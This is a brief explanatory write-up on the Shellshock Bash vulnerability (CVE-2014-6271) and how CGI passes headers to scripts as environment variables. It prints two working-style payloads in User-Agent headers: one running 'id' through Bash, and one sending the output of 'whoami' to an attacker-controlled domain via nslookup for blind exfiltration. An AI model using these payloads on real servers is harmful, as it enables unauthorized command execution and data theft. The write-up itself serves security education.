CVE - Shellshock

Is a critical vulnerability now reported as CVE-2014-6271 found in the Bash shell, which allows an attacker to execute arbitrary commands by injecting specially crafted environment variables. This affects applications and services that pass external input to Bash, such as CGI scripts in web servers.

CGI (Common Gateway Interface) is a standard protocol that defines how web servers communicate with external programs to generate dynamic content. The web server passes input, normally on requests, to a CGI script using environment variables and stdin, then the web server executes that script and sends the output back to the client as a web response.

Here we find how this could be exploited:

• We detected that a the values of headers like User-Agent or Referer are passed to a internal GCI

# We could craft a payload to generate a RCE to get a bash  
User-Agent: u() { :; }; echo; echo; /bin/bash -c 'id'

# If successful, the command will be executed. Sometimes we will see the reult on the response but in other cases we have to adopt blind techniques

# We could to play with a domain we control
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).<OurDomain>